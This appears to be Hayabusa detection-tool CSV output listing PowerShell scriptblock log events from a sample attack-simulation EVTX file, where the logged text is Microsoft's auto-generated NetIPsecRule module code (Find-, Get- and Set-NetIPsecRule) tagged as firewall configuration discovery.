ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, Value",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"FromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) 
{ $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, 